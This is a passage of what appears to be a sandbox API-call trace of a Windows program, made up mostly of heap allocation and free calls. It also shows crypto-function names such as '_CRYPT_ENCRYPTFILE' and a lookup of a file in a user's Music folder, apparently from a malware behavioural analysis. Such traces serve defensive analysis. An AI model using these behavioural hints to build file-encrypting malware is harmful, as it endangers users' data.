0x43ca280 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0117.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0117.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0117.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.538] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0117.538] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0117.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0117.539] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.539] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0117.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0117.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ea8 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0117.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0117.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0117.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0117.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.542] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.544] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ef1cc0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x5d4774b0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0x5d4774b0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x17844, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="caX1anHBaP9sA34Tftcq.mp3", cAlternateFileName="CAX1AN~1.MP3")) returned 0x41ac600 [0117.544] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.545] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.545] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0117.545] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0117.545] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.545] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0117.546] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0117.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.546] 